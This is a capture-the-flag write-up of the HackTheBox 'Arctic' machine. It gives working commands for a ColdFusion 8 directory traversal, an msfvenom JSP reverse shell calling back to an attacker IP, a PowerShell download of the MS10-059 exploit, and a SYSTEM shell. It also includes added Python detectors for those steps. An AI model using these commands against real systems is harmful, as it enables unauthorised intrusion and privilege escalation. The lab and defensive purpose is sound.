HacktheBox - Arctic Writeup

28/11/2019

Zero to OSCP Hero Writeup #14 - Arctic

Reconnaissance

1. Nmap Scan - Common Ports TCP Scan

Let's start with a TCP scan of the target IP address to determine which common ports are open and which services are running on them:

nmap -sC -sV -oA nmap/initial.tcp 10.10.10.11

  • -sC: Run the default nmap script scan to find potential vulnerabilities
  • -sV: Detect the service version
  • -oA: Output the result of the scan in all formats as nmap/initial.tcp

From the scan we can see that two ports are open providing RPC, along with port 8500, which nmap guesses may be providing FMTP (Flight Message Transfer Protocol).

2. Nmap Scan - All TCP Ports Scan

Okay, let's scan the entire TCP port range to confirm that there are no other ports open:

nmap -sC -sV -p- -oA nmap/full.tcp 10.10.10.11

  • -sC: Run the default nmap script scan to find potential vulnerabilities
  • -sV: Detect the service version
  • -p-: Run the nmap scan against all ports
  • -oA: Output the result of the scan in all formats as nmap/full.tcp

The full TCP scan confirmed that there are no additional ports open.

3. Nmap Scan - All UDP Ports Scan

We can do the same full port scan, but with the UDP ports:

nmap -sU -p- -oA nmap/full.udp 10.10.10.11

  • -sU: Run the scan against UDP ports
  • -p-: Run the nmap scan against all ports
  • -oA: Output the result of the scan in all formats as nmap/full.udp

The full UDP scan confirmed that there are no additional ports open.

Enumerating Port 8500 

1. Browse to 10.10.10.11:8500

As the box has only one realistic port to check for a further foothold, port 8500, let's see if we can browse to it and get any additional information:

Okay, so it seems that the machine is utilising Adobe ColdFusion, as a quick Google search shows that CFIDE is a directory within ColdFusion and that ColdFusion defaults to port 8500.

The CFIDE contents show a directory called Administrator that gives us the administrator login page. This also confirms that the ColdFusion instance running is version 8.

Initial Foothold - User

1. Adobe ColdFusion directory traversal vulnerability

It seems that the version of ColdFusion running on the box is vulnerable to a directory traversal exploit that lets us read the administrator password hash, which is stored locally in a file called 'password.properties'.

https://www.exploit-db.com/exploits/14641

1.2. Grab the administrator password hash

To exploit this, we request the following URL, which returns the admin hash:

https://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00en

And we now have the administrator hash presented to us on the login page!

2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03
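An added detection example, not part of the original writeup: a scanner that walks web access logs and flags requests to enter.cfm whose locale parameter carries dot-dot segments, an embedded NUL byte, or a reference to password.properties. The log lines below are constructed in combined log format; the real target's log format is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed access-log lines in combined log format; not from the original post.
SAMPLE_LOG = """\
10.10.14.59 - - [28/Nov/2019:10:01:02 +0000] "GET /CFIDE/administrator/enter.cfm?locale=en HTTP/1.1" 200 5123
10.10.14.59 - - [28/Nov/2019:10:01:09 +0000] "GET /CFIDE/administrator/enter.cfm?locale=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CColdFusion8%5Clib%5Cpassword.properties%00en HTTP/1.1" 200 5301
10.10.14.60 - - [28/Nov/2019:10:02:15 +0000] "GET /CFIDE/administrator/index.cfm HTTP/1.1" 302 0
10.10.14.61 - - [28/Nov/2019:10:03:40 +0000] "GET /CFIDE/administrator/enter.cfm?locale=..%2F..%2F..%2F..%2FColdFusion8%2Flib%2Fpassword.properties%00en HTTP/1.1" 200 5301
"""

REQUEST_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
TRAVERSAL_RE = re.compile(r'\.\.[\\/]')   # "..\" or "../" after decoding

def inspect_locale(target):
    """Return the reasons a request target looks like the locale traversal, or [] if it looks benign."""
    query = urlsplit(target).query
    reasons = []
    for value in parse_qs(query, keep_blank_values=True).get("locale", []):
        decoded = unquote(value)   # parse_qs decoded once; decode again to catch double-encoding
        if TRAVERSAL_RE.search(decoded):
            reasons.append("dot-dot traversal in locale")
        if "\x00" in decoded:
            reasons.append("embedded NUL byte in locale")
        if "password.properties" in decoded.lower():
            reasons.append("references password.properties")
    return reasons

def scan_log(text):
    """Run inspect_locale over every parsable request line and collect the hits."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        reasons = inspect_locale(m.group("target"))
        if reasons:
            hits.append({"ip": m.group("ip"), "target": m.group("target"), "reasons": reasons})
    return hits

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ip"], hit["reasons"])
```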

1.3. Utilise hashkiller to gather plaintext admin password

Now that we have the admin hash, which is a SHA-1 hash, we can use hashkiller to see if it can recover the plaintext password from the given hash, and as it shows, the plaintext admin password is 'happyday'.

1.4. Use admin credentials to log in to the admin portal

Now that we have admin creds, let's use them on the login panel and see what we can do from inside!

2. Getting a shell on the machine

To get a web-based shell on the machine we could use a ColdFusion-specific shell called a CFM shell, but as ColdFusion also accepts and executes JSP files, we can instead create a JSP reverse shell using msfvenom.

2.1: Create JSP reverse shell

Let's use msfvenom to create our shell:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.59 LPORT=9001 -f raw > shell.jsp

2.2. Identify the location of the default CFIDE directory 

We need to identify the contents of the default CFIDE directory mapping, as it will show us the directory where we can place our shell.

Server Settings > Settings Summary > ColdFusion Mappings 

We now know that we can insert our shell in the C:\ColdFusion8\wwwroot\CFIDE directory.

2.3 Upload our JSP shell file 

The next step is to browse to the Debugging and Logging tab and select 'Scheduled Tasks'. We need to create a new scheduled task, which will fetch our shell file from our web server and save it into the web root.

Debugging and Logging > Scheduled Tasks > New Scheduled Task

We now need to do the following: 

  • Set the task name to anything we wish
  • Set the URL to our python webserver hosting the shell file
  • Tick the box for 'Save output to a file'
  • Set File to C:\ColdFusion8\wwwroot\CFIDE\shell.jsp
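An added defensive check, not part of the original writeup: an audit of scheduled-task definitions that flags any task whose saved output lands inside the web root or carries a server-executable extension, or that fetches from a host outside an allow-list. The task records and the allow-list are constructed here; ColdFusion's real task store format is not assumed.

```python
import ntpath
from urllib.parse import urlsplit

# Constructed task records mirroring the fields of the admin form; not from the original post.
SAMPLE_TASKS = [
    {"name": "nightly-report", "url": "http://intranet.example/report", "publish": True,
     "file": r"C:\ColdFusion8\logs\report.txt"},
    {"name": "update", "url": "http://10.10.14.59/shell.jsp", "publish": True,
     "file": r"C:\ColdFusion8\wwwroot\CFIDE\shell.jsp"},
    {"name": "ping", "url": "http://intranet.example/health", "publish": False, "file": ""},
]

WEBROOT = r"C:\ColdFusion8\wwwroot"          # the mapping shown under Settings Summary
SCRIPT_EXTS = {".jsp", ".jspx", ".cfm", ".cfml", ".cfc"}
ALLOWED_HOSTS = {"intranet.example"}          # assumed allow-list of hosts tasks may fetch from

def resolves_under(path, root):
    """True if the Windows path, after collapsing '..' segments, sits inside root (case-insensitive)."""
    p = ntpath.normpath(path).lower()
    r = ntpath.normpath(root).lower().rstrip("\\")
    return p == r or p.startswith(r + "\\")

def audit_tasks(tasks, webroot=WEBROOT, allowed_hosts=ALLOWED_HOSTS):
    """Return one finding per task that violates any of the three checks."""
    findings = []
    for task in tasks:
        reasons = []
        host = urlsplit(task["url"]).hostname
        if host not in allowed_hosts:
            reasons.append(f"fetches from non-allow-listed host {host}")
        if task.get("publish") and task.get("file"):   # 'Save output to a file' is ticked
            path = task["file"]
            if resolves_under(path, webroot):
                reasons.append("output saved inside the web root")
            ext = ntpath.splitext(path)[1].lower()
            if ext in SCRIPT_EXTS:
                reasons.append(f"output has server-executable extension {ext}")
        if reasons:
            findings.append({"name": task["name"], "reasons": reasons})
    return findings

if __name__ == "__main__":
    for finding in audit_tasks(SAMPLE_TASKS):
        print(finding["name"], finding["reasons"])
```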

2.4 Start netcat listener 

Before we browse to our shell file, we need to start a netcat listener to capture the connection:

nc -lvnp 9001

2.5 Browse to our uploaded JSP shell file

We're all set to execute our shell file!

Browse to 10.10.10.11:8500/CFIDE/shell.jsp ... and we get a shell! 

We can find the user.txt file in the user Tolis' desktop folder:

more user.txt 

Privilege Escalation - Root

1. Further Enumeration of the machine

Now that we have an initial foothold, we again go back to the cornerstone of gaining elevated privileges... enumeration! 

1.2. System Information

Let's see what OS type and version we are running and whether any hotfixes have been applied:

systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"Hotfix(s)"

Okay, so we now know that we have a foothold on a Windows Server 2008 R2 build 7600 that has not had any hotfixes applied, meaning this box is very likely to be vulnerable to a number of public exploits!

1.3 Current user information and their group memberships

Now let's see what user we are currently running as:

echo %username%

We are running as a user called tolis; let's see if they are part of any groups that may be useful to us, like the Administrators group:

net user tolis 

Okay, so the user tolis does not have any administrator privileges. 

2. Windows Exploit Suggester

Because the machine is likely to be vulnerable to some public exploits due to no hotfixes being applied, I'm going to use the trusty Windows Exploit Suggester to see if any vulnerabilities exist!

2.1. Update WES Database 

Once you have cloned the git repo to your machine, you need to grab the latest WES database; we can do this with the following command:

./windows-exploit-suggester.py --update

2.2. Copy the machine's systeminfo output

We now need a copy of the machine's systeminfo output to run through the WES script, so copy and paste the contents into a text file within the WES folder.

2.3. Run Windows Exploit Suggester

Now that we have the latest WES database and a copy of the machine's systeminfo output, we can run the WES python script:

./windows-exploit-suggester.py --database 2019-11-28-mssb.xls --systeminfo systeminfo.txt

From the output we can see that there are various possible vulnerabilities, but one of them interests me straight away: MS10-059.

MS10-059, or Chimichurri, exploits a local privilege escalation vulnerability which enables an attacker to run arbitrary code with SYSTEM privileges.

3. Exploiting MS10-059 Chimichurri

As I'm familiar with this exploit, I know that there is a pre-compiled executable, which can be found here. Now just download it to your machine.

3.1. Start a python webserver

We now need to download the exploit to the vulnerable machine; let's start by hosting the executable via a python web server:

python -m SimpleHTTPServer 80

3.2. Create exploit PowerShell file to download Chimichurri.exe

To download the executable, we need to create a PowerShell file that has the components needed to download the file from our attacker machine:

echo $webclient = New-Object System.Net.WebClient >>exploit.ps1

echo $url = "http://10.10.14.59/Chimichurri.exe" >>exploit.ps1

echo $file = "Chimichurri.exe" >>exploit.ps1

echo $webclient.DownloadFile($url,$file) >>exploit.ps1

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File exploit.ps1

Once the last line is entered, we should see from the web server that the Chimichurri executable has been downloaded by the vulnerable machine.
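An added detection example, not part of the original writeup: correlating process command lines so that a .ps1 built line-by-line with cmd.exe echo redirections and then run with -ExecutionPolicy Bypass -File stands out, rather than alerting on every PowerShell launch. The command lines are constructed samples; how your collector records them is an assumption.

```python
import re
import ntpath

# Constructed process command lines as a Sysmon/EDR-style collector might record them; not from the original post.
SAMPLE_CMDLINES = [
    r'cmd.exe /c echo $webclient = New-Object System.Net.WebClient >>exploit.ps1',
    r'cmd.exe /c echo $url = "http://10.10.14.59/Chimichurri.exe" >>exploit.ps1',
    r'cmd.exe /c echo $webclient.DownloadFile($url,$file) >>exploit.ps1',
    r'powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File exploit.ps1',
    r'powershell.exe -NoProfile -File C:\Scripts\Backup.ps1',
]

# "echo <body> >>something.ps1" from cmd.exe appends one line to a script file.
ECHO_RE = re.compile(r'\becho\s+(?P<body>.*?)\s*>>\s*"?(?P<file>[^"\s]+\.ps1)"?', re.I)
RUN_RE = re.compile(r'powershell(\.exe)?\b(?P<args>.*)', re.I)
FILE_ARG_RE = re.compile(r'-File\s+"?(?P<file>[^"\s]+)"?', re.I)
DOWNLOAD_RE = re.compile(r'Net\.WebClient|\.Download(File|String)\(', re.I)
BYPASS_RE = re.compile(r'-Exec(utionPolicy)?\s+Bypass', re.I)

def correlate(cmdlines):
    """Flag a PowerShell script that was written line-by-line with echo and then executed."""
    staged = {}   # script basename -> indicators seen while it was being written
    alerts = []
    for cmd in cmdlines:
        m = ECHO_RE.search(cmd)
        if m:
            flags = staged.setdefault(ntpath.basename(m.group("file")).lower(), set())
            flags.add("built_with_echo")
            if DOWNLOAD_RE.search(m.group("body")):
                flags.add("webclient_download")
            continue
        m = RUN_RE.search(cmd)
        f = FILE_ARG_RE.search(m.group("args")) if m else None
        if not f:
            continue
        key = ntpath.basename(f.group("file")).lower()
        flags = set(staged.get(key, ()))
        if BYPASS_RE.search(m.group("args")):
            flags.add("execution_policy_bypass")
        if "built_with_echo" in flags:   # only scripts staged via echo raise an alert
            alerts.append({"script": key, "cmdline": cmd, "flags": sorted(flags)})
    return alerts

if __name__ == "__main__":
    for alert in correlate(SAMPLE_CMDLINES):
        print(alert["script"], alert["flags"])
```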

3.3. Start a netcat listener

Now that the exploit is on the machine, let's start a netcat listener to capture the connection.

3.4. Run the exploit

To run the exploit, we need to give it the IP and Port we want it to connect to: 

Chimichurri.exe 10.10.14.59 9003

And we now have a connection to our new netcat listener! 

Let's confirm that we are running as SYSTEM:

whoami

And we can now grab the root.txt flag from the Administrator Desktop: 

more root.txt 

Conclusion

Thanks for reading! Next up is Box #15 - Nineveh!